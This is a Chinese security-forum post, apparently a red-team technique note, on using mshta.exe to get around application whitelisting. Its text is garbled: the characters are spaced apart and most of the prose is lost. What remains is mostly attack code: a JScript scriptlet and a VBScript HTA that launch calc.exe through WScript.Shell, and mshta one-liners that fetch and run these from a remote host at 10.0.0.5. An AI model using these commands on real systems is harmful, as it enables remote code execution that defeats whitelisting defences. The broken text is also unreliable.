搜索

[28025] 2020-01-05_MSHTA代码执行-绕过应用程序白名单

文档创建者:s7ckTeam
浏览次数:239
最后更新:2025-01-19
2020-01-05_MSHTA代码执行-绕过应用程序白名单 M S H T A - O t s   2 0 2 0 - 0 1 - 0 5 c a l c . e x e h t t p : / / 1 0 . 0 . 0 . 5 / m . s c t < ? X M L   v e r s i o n = " 1 . 0 " ? > < s c r i p t l e t > < r e g i s t r a t i o n   d e s c r i p t i o n = " D e s c "   p r o g i d = " P r o g i d "   v e r s i o n = " 0 "   c l a s s i d = " { A A A A 1 1 1 1 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 F E E D A C D C } " < p u b l i c >         < m e t h o d   n a m e = " E x e c " > < / m e t h o d > < / p u b l i c > < s c r i p t   l a n g u a g e = " J S c r i p t " > < ! [ C D A T A [   f u n c t i o n   E x e c ( )   {     v a r   r   =   n e w   A c t i v e X O b j e c t ( " W S c r i p t . S h e l l " ) . R u n ( " c a l c . e x e " ) ;   } ] ] > < / s c r i p t > < / s c r i p t l e t > s c r i p t l e t a t t a c k e r @ v i c t i m #   f r o m   p o w e r s h e l l / c m d   / c   m s h t a . e x e   j a v a s c r i p t : a = ( G e t O b j e c t ( " s c r i p t : h t t p : / / 1 0 . 0 . 0 . 5 / m . s c t " ) ) . E x e c ( ) ; c l o s e ( ) ; c a l c . e x e m s h t a . e x e c a l c . e x e m h s t a c m d 退 s y s m o n m s h t a
h t a m s h t a . e x e   h t t p : / / 1 0 . 0 . 0 . 5 / m . h t a
h t t p : / / 1 0 . 0 . 0 . 5 / m . h t a < h t m l > < h e a d > < s c r i p t   l a n g u a g e = " V B S c r i p t " >           S u b   R u n P r o g r a m                 S e t   o b j S h e l l   =   C r e a t e O b j e c t ( " W s c r i p t . S h e l l " )                 o b j S h e l l . R u n   " c a l c . e x e "         E n d   S u b R u n P r o g r a m ( ) < / s c r i p t > < / h e a d >   < b o d y >         N o t h i n g   t o   s e e   h e r e . . < / b o d y > < / h t m l > O t s    
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理